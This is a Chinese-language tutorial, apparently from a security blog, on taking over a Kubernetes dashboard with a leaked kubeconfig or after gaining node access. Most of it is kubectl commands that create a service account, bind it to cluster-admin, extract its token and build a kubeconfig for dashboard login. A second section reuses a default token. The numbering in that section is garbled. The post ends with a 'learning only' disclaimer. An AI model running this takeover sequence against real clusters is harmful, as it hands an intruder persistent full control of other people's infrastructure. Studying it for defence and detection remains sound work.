前言

本篇文章我们主要介绍以下两种利用场景下如何通过kubeconfig来接管Kubernet dashboard

  • 利用场景1:项目托管不当导致kubernetconfig文件泄露,例如:Github、Gitlab等,之后接管Kubernet dashboard

  • 利用场景2:在获取到Node节点权限的情况下通过kubeconfig来接管Kubernet dashboard

基础知识

用户凭证保存在kubeconfig文件中,kubectl通过以下顺序来找到kubeconfig文件

  • 如果提供了--kubeconfig参数,就使用提供的kubeconfig文件

  • 如果未提供--kubeconfig参数,但设置了环境变量$KUBECONFIG,则使用该环境变量提供的kubeconfig文件

  • 如果以上两种情况都没有,那么kubectl就使用默认的kubeconfig文件$HOME/.kube/config

利用流程

Step 1:获取namespace

kubectl get namespace

Step 2:创建dashboard管理用户

kubectl create serviceaccount dashboard-admin -n kubernetes-dashboard

Step 3:绑定用户为集群管理用户

kubectl create clusterrolebinding dashboard-cluster-admin --clusterrole=cluster-admin --serviceaccount=kubernetes-dashboard:dashboard-admin

Step 4:获取tocken(后续可以使用token登录)

kubectl get sa,secrets -n kubernetes-dashboard
kubectl describe secret -n kubernetes-dashboard dashboard-admin-token-kqsll

Step 5:生成kubeconfig文件

DASH_TOCKEN=$(kubectl get secret -n kubernetes-dashboard dashboard-admin-token-kqsll -o jsonpath={.data.token}|base64 -d)

kubectl config set-cluster kubernetes --server=192.168.17.144:30001 --kubeconfig=/home/r00t/dashbord-admin.conf

kubectl config set-credentials dashboard-admin --token=$DASH_TOCKEN --kubeconfig=/home/r00t/dashbord-admin.conf

kubectl config set-context dashboard-admin@kubernetes --cluster=kubernetes --user=dashboard-admin --kubeconfig=/home/r00t/dashbord-admin.conf

kubectl config use-context dashboard-admin@kubernetes --kubeconfig=/home/r00t/dashbord-admin.conf

Step 6:赋予读写执行权限

chmod 777 dashboard-admin.conf

Step 7:使用生成的dashbord-admin.conf登录dashboard

相关扩展

上面的我们是在master节点下创建管理账户并获取其配置文件来访问的Dashboard,下面我们介绍一下如何通过修改默认的配置文件来实现对Dashboard的访问

Step 1:获取环境变量

evn

Step 2:复制一份到桌面文件

Step 3:获取token信息

kubectl get sa,secrets -n kubernetes-dashboard

kubectl describe secret -n kubernetes-dashboard default-token-6lf6k

Step 7:修改config.conf添加下面的token部分

Step 8:使用token访问dashboard,可以看到是低权限用户,故而还是需要自我去构建才好,或者是用户在启动dashboard的时候有指定config那么可以直接复制config并修改其内容实现

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。